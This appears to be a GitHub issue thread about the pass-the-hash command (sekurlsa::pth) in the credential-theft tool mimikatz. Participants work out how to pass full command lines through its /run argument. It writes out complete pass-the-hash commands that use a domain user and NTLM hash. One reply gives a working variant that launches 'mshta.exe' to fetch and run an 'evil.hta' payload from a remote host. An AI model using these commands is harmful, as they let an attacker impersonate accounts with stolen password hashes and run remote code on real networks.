Closed MichaelGrafnetter closed 8 years ago
Hi Michael,
I think you missed it : https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth
It's the /run:foo
One "not documented yet" argument is /impersonate
to affect the new token to the current mimikatz thread :)
Thx for your reply. I know about the /run parameter, but I did not know that you can pass the whole command line to it.
But I still have not figured out a way to use it in batch mode, e.g. from BAT or PS1 scripts, which is the way I use mimikatz mostly. This has not worked for me:
mimikatz.exe sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:ba8098ba09890a80b9a8098b "/run:cmd.exe /c systeminfo" exit
it's: /run"foo bar"
but arguments problem/escaping is always hard.
On my side a deal with argv[], so it's external to mimikatz to push it in the right way ;)
If I remember well, with PowerShell, you can push arguments in an array.
Neither /run"foo bar"
, nor /run:"foo bar"
works for me :-( Powershell is not helpful, either, because the entire command line has to be passed as a single string:
.\mimikatz.exe "sekurlsa::pth /user:$userName /domain:$domain /ntlm:$hash /run:cmd.exe" exit
But nevermind, it is not that important. I just thought there would be a trivial solution.
This approach, permits to pass NOT only single string and worked for me:
.\mimikatz.exe
mimikatz # sekurlsa::pth /user:$userName /domain:$domain /ntlm:$hash /run:"mshta.exe http://ip/evil.hta"
Hi Ben, I just wonder if you could add support for passing command line parameters to the binaries executed by sekurlsa::pth. Or have I just missed this feature? And thx again for your great work.